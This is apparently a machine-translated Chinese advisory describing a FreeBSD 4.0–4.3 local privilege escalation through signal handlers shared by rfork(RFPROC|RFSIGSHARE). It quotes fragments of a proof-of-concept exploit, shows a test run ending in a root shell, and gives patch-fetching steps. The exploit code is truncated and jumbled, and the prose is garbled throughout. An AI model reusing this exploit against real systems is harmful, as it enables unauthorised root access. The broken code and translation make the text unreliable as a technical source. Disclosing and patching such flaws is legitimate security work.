A local attacker using FreeBSD4. 3 design vulnerabilities to obtain system privilege-vulnerability warning-the black bar safety net

ID MYHACK58:62200714957
Type myhack58
Reporter 佚名
Modified 2007-04-10T00:00:00


Found FreeBSD 4.3 there is a design on the vulnerability, which allows the user in the other processes inserted in the signal handlers to. The problem is in the rfork(RFPROC|RFSIGSHARE), if the child process exec() a setuid program, then the parent process set up a signal handlers, the signal handlers will be in the sub-process is copied. Send a signal to the child process will be able to result in signal handlers is executed. To exploit this vulnerability, a local attacker can obtain root privileges. The following code is only used for testing and research of this vulnerability, if you use it for an improper way to please at your own risk -------------vvfreebsd. c---------------------- /} } printf("vvfreebsd. Written by Georgi Guninski\n"); printf("shall jump to %x\n",vv1); if(! (pid=rfork(RFPROC|RFSIGSHARE))) { printf("child=%d\n",getpid()); // /usr/bin/login and rlogin work for me. ping gives nonsuid shell // if(! execl("/usr/bin/rlogin","rlogin","localhost",0)) kill(pid,MYSIG); printf("done\n"); while(4 2); } ............................... ......................... ............. Affected versions: FreeBSD 4.3 4.2 4.1 4.0 The early versions maybe affected Solution: There is no ** 2001-07-14 add by NetDemon(netdemon@20cn.net)**** Test procedure method of use: netdemon%gcc-o vvbsd vvbsd. c netdemon%cp /bin/sh /tmp netdemon%./ vvbsd vvfreebsd. Written by Georgi Guninski shall jump to bfbffe71 child=6 1 0 5 6 login: login: # done

FreeBSD in order to make the patch Methods:

fetch ftp://ftp.FreeBSD.org/pub/FreeBSD/CERT/patches/SA-01:42/signal-4.3.patch

fetch ftp://ftp.FreeBSD.org/pub/FreeBSD/CERT/patches/SA-01:42/signal-4.3.patch.asc

cd /usr/src/sys/kern

patch-p < /path/to/patch |